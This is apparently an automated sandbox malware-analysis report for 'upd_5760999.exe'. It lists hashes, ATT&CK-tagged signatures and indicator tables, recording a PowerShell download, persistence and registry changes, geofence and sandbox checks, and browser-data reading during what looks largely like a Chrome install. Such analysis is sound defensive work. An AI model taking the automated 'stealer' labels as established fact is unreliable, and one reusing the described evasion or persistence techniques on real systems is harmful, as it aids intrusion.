c51feb4da8a35740590c09e8882e783232d3a623ce8c1b8966175c77cafaee5b

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19/09/2024, 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

upd_5760999.exe
Size

106KB
MD5

e13a57d65d2a64e971de7cfc3f6487bc
SHA1

8db4c806760027c9bad900351904704a7de44702
SHA256

c51feb4da8a35740590c09e8882e783232d3a623ce8c1b8966175c77cafaee5b
SHA512

e4edad1797634c966b90d78b41b6d1ef66f9206e57691b9d03cc43b01d372820c4cb1cc004c710073e268917867cb3f8e69433c803d7d05a42cf37e8f19d390e
SSDEEP

1536:vFZbqmt37GKAqtqltO6MddWwddIYq1r+8Nyh:vPqmtrGKAvlIntddqh+Kyh

Score

8^/10

discovery evasion execution persistence privilege_escalation spyware stealer trojan

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
21	4996	powershell.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\128.0.6613.138\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1"	setup.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4996	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	chrome.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 25 IoCs

pid	Process
2436	ChromeSetup.exe
5088	updater.exe
1768	updater.exe
1284	updater.exe
2600	updater.exe
3236	updater.exe
2848	updater.exe
4384	128.0.6613.138_chrome_installer.exe
3040	setup.exe
4908	setup.exe
1892	setup.exe
3228	setup.exe
2476	chrome.exe
1228	chrome.exe
4520	chrome.exe
220	chrome.exe
4880	chrome.exe
3316	chrome.exe
4704	chrome.exe
1968	elevation_service.exe
872	chrome.exe
3588	chrome.exe
3268	chrome.exe
5004	updater.exe
3784	updater.exe

Loads dropped DLL 25 IoCs

pid	Process
2476	chrome.exe
1228	chrome.exe
2476	chrome.exe
4520	chrome.exe
220	chrome.exe
4520	chrome.exe
4880	chrome.exe
4880	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
3316	chrome.exe
4704	chrome.exe
3316	chrome.exe
4704	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
872	chrome.exe
872	chrome.exe
3588	chrome.exe
3588	chrome.exe
3268	chrome.exe
3268	chrome.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	chrome.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk	setup.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\te.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\v8_context_snapshot.bin	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\VisualElements\SmallLogo.png	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\libEGL.dll	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\optimization_guide_internal.dll	setup.exe
File created	C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\CHROME.PACKED.7Z	128.0.6613.138_chrome_installer.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\bg.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\VisualElements\SmallLogoBeta.png	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\chrome.exe	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\chrome_proxy.exe	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\chrome_wer.dll	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\chrome_100_percent.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\fil.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\ta.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\os_update_handler.exe	setup.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\0ef3f1db-52b1-4640-ae60-41854be0ade6.tmp	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\0ef3f1db-52b1-4640-ae60-41854be0ade6.tmp	updater.exe
File created	C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\128.0.6613.138_chrome_installer.exe	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\fr.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\pl.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\VisualElements\LogoBeta.png	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad\metadata	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\af.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\hu.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\id.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\ko.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\nl.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\pt-BR.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\th.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad\metadata	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad\settings.dat	updater.exe
File created	C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3236_1668274537\CR_9BAC3.tmp\SETUP.EX_	128.0.6613.138_chrome_installer.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\sr.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\pt-PT.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad\settings.dat	updater.exe
File opened for modification	C:\Program Files (x86)\Google\Update\GoogleUpdate.exe	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\chrome_200_percent.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\el.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\sk.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\sw.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad\metadata	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\notification_helper.exe	setup.exe
File created	C:\Program Files\Google\Chrome\Application\128.0.6613.138\Installer\setup.exe	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\dxil.dll	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\am.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\chrome.VisualElementsManifest.xml	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe587039.TMP	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\ca.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\es.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\et.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\hr.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\PrivacySandboxAttestationsPreloaded\privacy-sandbox-attestations.dat	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\chrome_pwa_launcher.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\Crashpad\metadata	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\398996d0-0f30-44b8-9ef3-3b880c29bf34.tmp	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe593a31.TMP	updater.exe
File created	C:\Program Files\Google\Chrome\Application\chrome.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log.old	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\lv.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source3040_1883692196\Chrome-bin\128.0.6613.138\Locales\mr.pak	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ChromeSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4384	128.0.6613.138_chrome_installer.exe
3040	setup.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4692	systeminfo.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133712304334721945"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Google\Chrome	setup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	setup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Google	setup.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Google\Chrome\InstallerPinned = "0"	setup.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{C4622B28-A747-44C7-96AF-319BE5C3B261}\1.0\0\win64	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4334319-8210-469B-8262-DD03623FEB5B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}\LocalService = "GoogleUpdaterService130.0.6679.0"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{0125FBD6-CB11-5A7E-828A-0845F90C7D4E}\1.0\0\win32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4334319-8210-469B-8262-DD03623FEB5B}\TypeLib\ = "{F4334319-8210-469B-8262-DD03623FEB5B}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\130.0.6679.0\\updater.exe\\6"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{699F07AD-304C-5F71-A2DA-ABD765965B54}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\TypeLib\ = "{05A30352-EB25-45B6-8449-BCA7B0542CE5}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{E9CD91E3-A00C-4B9E-BD63-7F34EB815D98}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\AppID\{521FDB42-7130-4806-822A-FC5163FAD983}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{85AE4AE3-8530-516B-8BE4-A456BF2637D3}\1.0\0	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\1.0\0\win32	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{27634814-8E41-4C35-8577-980134A96544}\1.0\0\win64	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{513BC7DA-6B8D-45F7-90A0-2E9F66CEF962}\1.0\0\win64	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\ProxyStubClsid32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}\TypeLib\ = "{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{513BC7DA-6B8D-45F7-90A0-2E9F66CEF962}\1.0	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\1.0\ = "GoogleUpdater TypeLib for IProcessLauncher2"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\TypeLib\ = "{F63F6F8B-ACD5-413C-A44B-0409136D26CB}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C4622B28-A747-44C7-96AF-319BE5C3B261}\TypeLib\ = "{C4622B28-A747-44C7-96AF-319BE5C3B261}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F966A529-43C6-4710-8FF4-0B456324C8F4}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\130.0.6679.0\\updater.exe\\6"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ = "IProcessLauncher2"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{1588C1A8-27D9-563E-9641-8D20767FB258}\ProxyStubClsid32	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{85AE4AE3-8530-516B-8BE4-A456BF2637D3}\1.0\0\win64	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4FE76BC-62B9-49FC-972F-C81FC3A926DB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\TypeLib\ = "{247954F9-9EDC-4E68-8CC3-150C2B89EADF}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B16B5A0E-3B72-5223-8DF0-9117CD64DE77}\ = "IUpdaterObserverSystem"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B16B5A0E-3B72-5223-8DF0-9117CD64DE77}\TypeLib\ = "{B16B5A0E-3B72-5223-8DF0-9117CD64DE77}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4DC034A8-4BFC-4D43-9250-914163356BB0}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\130.0.6679.0\\updater.exe\\6"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\1.0\0	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\1.0\0\win64	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{4DC034A8-4BFC-4D43-9250-914163356BB0}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3WebMachine\CLSID\ = "{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6430040A-5EBD-4E63-A56F-C71D5990F827}\ = "IProcessLauncher2System"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\TypeLib\ = "{8476CE12-AE1F-4198-805C-BA0F9B783F57}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{34527502-D3DB-4205-A69B-789B27EE0414}\1.0\0	updater.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}\ProgID	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{1588C1A8-27D9-563E-9641-8D20767FB258}\1.0	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B7FD5390-D593-5A8B-9AE2-23CE39822FD4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}\TypeLib\Version = "1.0"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4DC034A8-4BFC-4D43-9250-914163356BB0}\ = "IPolicyStatusValueSystem"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0486745C-8D9B-5377-A54C-A61FFAA0BBE4}\TypeLib\Version = "1.0"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\TypeLib	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4622B28-A747-44C7-96AF-319BE5C3B261}\TypeLib\ = "{C4622B28-A747-44C7-96AF-319BE5C3B261}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4334319-8210-469B-8262-DD03623FEB5B}\ = "IPolicyStatus3System"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F966A529-43C6-4710-8FF4-0B456324C8F4}\TypeLib\Version = "1.0"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\ = "IAppBundleWeb"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{4DC034A8-4BFC-4D43-9250-914163356BB0}\ProxyStubClsid32	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{F4FE76BC-62B9-49FC-972F-C81FC3A926DB}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{6430040A-5EBD-4E63-A56F-C71D5990F827}\1.0\0\win64	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6430040A-5EBD-4E63-A56F-C71D5990F827}\ = "IProcessLauncher2System"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\130.0.6679.0\\updater.exe\\6"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\1.0\0\win32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\TypeLib\Version = "1.0"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{85AE4AE3-8530-516B-8BE4-A456BF2637D3}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\130.0.6679.0\\updater.exe\\4"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F4FE76BC-62B9-49FC-972F-C81FC3A926DB}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\130.0.6679.0\\updater.exe\\6"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{4DC034A8-4BFC-4D43-9250-914163356BB0}\1.0\0\win32	updater.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
4996	powershell.exe
4996	powershell.exe
5088	updater.exe
5088	updater.exe
5088	updater.exe
5088	updater.exe
5088	updater.exe
5088	updater.exe
1284	updater.exe
1284	updater.exe
1284	updater.exe
1284	updater.exe
1284	updater.exe
1284	updater.exe
3236	updater.exe
3236	updater.exe
3236	updater.exe
3236	updater.exe
3236	updater.exe
3236	updater.exe
3236	updater.exe
3236	updater.exe
5088	updater.exe
5088	updater.exe
2476	chrome.exe
2476	chrome.exe
5004	updater.exe
5004	updater.exe
5004	updater.exe
5004	updater.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
2476	chrome.exe
2476	chrome.exe
